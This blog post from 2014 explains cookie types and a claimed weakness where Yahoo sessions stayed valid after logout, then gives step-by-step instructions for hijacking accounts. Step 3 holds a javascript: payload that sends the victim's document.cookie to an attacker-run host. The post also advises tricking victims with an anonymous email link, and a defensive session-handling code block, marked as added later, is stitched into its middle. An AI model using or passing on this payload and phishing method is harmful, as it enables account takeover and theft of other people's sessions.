Posted in: Blog, Posted On: Apr 09, 2014, Posted By: cyberinfoadmin

Session Hijacking of Yahoo.com

What is a Cookie?

A cookie is a piece of information that stays on a computer after it has accessed the internet. There are many types of cookies; some are described below:

Session cookie

A session cookie lasts only while the person is using the internet. A web browser normally deletes session cookies when it quits. A session cookie is created when no Expires directive is provided at the time the cookie is set.

Persistent cookie

A persistent cookie will outlast users’ sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visits the website. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called tracking cookies.

Secure cookie

A secure cookie is only used when a browser is visiting a server via HTTPS, ensuring that the cookie is always encrypted when transmitting from client to server. This makes the cookie less likely to be exposed to cookie theft via eavesdropping.

[Diagram: how a session works]

The weakness in the Yahoo server is that the session does not expire soon enough when a user logs out. Instead, it remains valid for 24-48 hours before expiring! This means that once an attacker gets the victim’s cookies, he/she can access the Yahoo account for 24-48 hours without the password!
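
The logout weakness described above, next to its fix, as an added example that is not part of the original post and is not Yahoo's code. All function names, the HttpOnly and SameSite attributes and the 15-minute idle timeout are assumptions chosen for illustration.

```javascript
// Added example: server-side session handling where logout revokes the session.
// Names, timeout and cookie attributes are hypothetical, not from the post.
const crypto = require('crypto');

const IDLE_TIMEOUT_MS = 15 * 60 * 1000;  // assumed policy: 15 minutes idle
const sessions = new Map();               // sessionId -> { user, lastSeen }

// Create a session and return the Set-Cookie header value for it.
function login(user, now = Date.now()) {
  const id = crypto.randomBytes(32).toString('hex');
  sessions.set(id, { user, lastSeen: now });
  // No Expires/Max-Age, so this is a session cookie. Secure: HTTPS only.
  // HttpOnly: the value is not readable through document.cookie.
  return { id, setCookie: `sid=${id}; Path=/; Secure; HttpOnly; SameSite=Lax` };
}

// Resolve a presented cookie value to a user, or null if it is not valid.
function authenticate(id, now = Date.now()) {
  const s = sessions.get(id);
  if (!s) return null;
  if (now - s.lastSeen > IDLE_TIMEOUT_MS) {  // expire idle sessions server-side
    sessions.delete(id);
    return null;
  }
  s.lastSeen = now;
  return s.user;
}

// Weak logout: only asks the browser to drop the cookie; the server keeps
// honouring the old value, which is the behaviour the post describes.
function logoutClientOnly() {
  return 'sid=; Path=/; Max-Age=0; Secure; HttpOnly';
}

// Hardened logout: revoke the session on the server, then clear the cookie.
function logout(id) {
  sessions.delete(id);
  return 'sid=; Path=/; Max-Age=0; Secure; HttpOnly';
}

// Constructed scenario: a copied cookie value is presented again after logout.
function demo() {
  const t0 = 1000000;
  const a = login('alice', t0);
  logoutClientOnly();
  const afterWeak = authenticate(a.id, t0 + 60000);   // still accepted
  logout(a.id);
  const afterHard = authenticate(a.id, t0 + 120000);  // rejected
  const b = login('bob', t0);
  const afterIdle = authenticate(b.id, t0 + IDLE_TIMEOUT_MS + 1);  // rejected
  return { afterWeak, afterHard, afterIdle, cookie: a.setCookie };
}
```

The session becomes useless to anyone holding a copy of the cookie only when the server forgets it; clearing the cookie in the browser alone changes nothing on the server.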

Step 1:

I’m doing this Yahoo session hijacking on my own ID, so I’m going to use two browsers:

Mozilla Firefox
Chrome
paid Webhosting (with Yahoo session stealer code)

Note, it won’t do webhosting for free due to security reasons.

Step 2:

Victim’s browser: Chrome

Attacker’s browser: Mozilla

Step 3:

javascript:document.location=’http://Yourwebsite.com/yahoo.php?ex=’.concat(escape(document.cookie));

Ask your victim to type in the URL. After a while, you can see the cookies appear in our webhosting!

Since it is not practical to make the victim inject our JavaScript into their browser, we have to trick them using DOM XSS (JavaScript): make that JavaScript into a URL, send it to them in an anonymous e-mail and make them click it, and then you can see the magic of hacking!

